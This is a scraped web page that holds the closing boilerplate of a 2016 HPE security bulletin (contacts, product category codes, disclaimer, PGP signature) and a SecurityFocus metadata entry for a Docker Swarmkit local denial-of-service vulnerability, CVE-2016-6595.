Third Party Security Patches: Third party security patches that are to be
installed on systems running Hewlett Packard Enterprise (HPE) software
products should be applied in accordance with the customer's patch management
policy.

Support: For issues about implementing the recommendations of this Security
Bulletin, contact normal HPE Services support channel. For other issues about
the content of this Security Bulletin, send e-mail to security-alert (at) hpe (dot) com. [email concealed]

Report: To report a potential security vulnerability for any HPE supported
product:
Web form: https://www.hpe.com/info/report-security-vulnerability
Email: security-alert (at) hpe (dot) com [email concealed]

Subscribe: To initiate a subscription to receive future HPE Security Bulletin
alerts via Email: http://www.hpe.com/support/Subscriber_Choice

Security Bulletin Archive: A list of recently released Security Bulletins is
available here: http://www.hpe.com/support/Security_Bulletin_Archive

Software Product Category: The Software Product Category is represented in
the title by the two characters following HPSB.

3C = 3COM
3P = 3rd Party Software
GN = HPE General Software
HF = HPE Hardware and Firmware
MU = Multi-Platform Software
NS = NonStop Servers
OV = OpenVMS
PV = ProCurve
ST = Storage Software
UX = HP-UX

Copyright 2016 Hewlett Packard Enterprise

Hewlett Packard Enterprise shall not be liable for technical or editorial
errors or omissions contained herein. The information provided is provided
"as is" without warranty of any kind. To the extent permitted by law, neither
HP or its affiliates, subcontractors or suppliers will be liable for
incidental,special or consequential damages including downtime cost; lost
profits; damages relating to the procurement of substitute products or
services; or damages for loss of data, or software restoration. The
information in this document is subject to change without notice. Hewlett
Packard Enterprise and the names of Hewlett Packard Enterprise products
referenced herein are trademarks of Hewlett Packard Enterprise in the United
States and other countries. Other product and company names mentioned herein
may be trademarks of their respective owners.

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1

iQEcBAEBAgAGBQJXyJX9AAoJEGIGBBYqRO9/M/wH/26FtoAFFJZ2vb9Y3nF3rIzu
lS0Vd+kOf45OVntpJ3e5MLISEBWMxdibNTG49iXsqS0H/BsEV9j09oAHHjCpwylk
OwPB0v0xVzCuI3mUgQ8ANBj4oIkYzRv0vfwbAwpMrrAA2goLxijhxxUR9sE4Zrz3
93FwNW2H/IUq7ma5LCUDzudNgDfXR6iTH7zKJKLYDz/mPBwD/IJGtv8Si6O5oZ03
hUOqNl6irkP+415K358PU927CcQcFkLY+Wv3OsitG+w1AILRE5IV4aqIPVJCPwUl
U9vTn5jyVkHz0FHr45eK6V+ts2xaGbKYcW4fYIzfAoYUO/YBULiZ8Zwlr/TNM+g=
=Dh4J
-----END PGP SIGNATURE-----

[ reply ]


SecurityFocus Vulnerabilities

  • info
  • discussion
  • exploit
  • solution
  • references
Docker Swarmkit Local Denial of Service Vulnerability

Bugtraq ID: 92195
Class: Failure to Handle Exceptional Conditions
CVE: CVE-2016-6595
Remote: No
Local: Yes
Published: Jul 29 2016 12:00AM
Updated: Aug 04 2016 07:00PM
Credit: zhangkaixiang.
Vulnerable: Docker swarmkit 1.12
Not Vulnerable:


SecurityFocus Vulnerabilities